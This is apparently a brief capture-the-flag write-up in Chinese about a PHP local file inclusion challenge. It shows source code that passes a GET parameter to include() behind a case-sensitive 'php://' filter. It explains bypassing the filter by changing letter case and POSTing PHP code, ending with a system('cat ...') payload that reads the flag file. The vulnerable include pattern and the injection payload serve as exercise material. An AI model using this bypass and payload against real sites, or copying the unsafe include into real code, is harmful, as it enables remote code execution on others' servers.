<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
源文件中用strstr
过滤掉了php://
,但是strstr
区分大小写(可以mark一下,过滤的方法之一就是看是否大小写敏感)。然后用postman POST一些数据。
body里面传入php代码
response里面有一个文件flag is here
然后继续post php代码
<?php system("cat fl4gisisish3r3.php")?>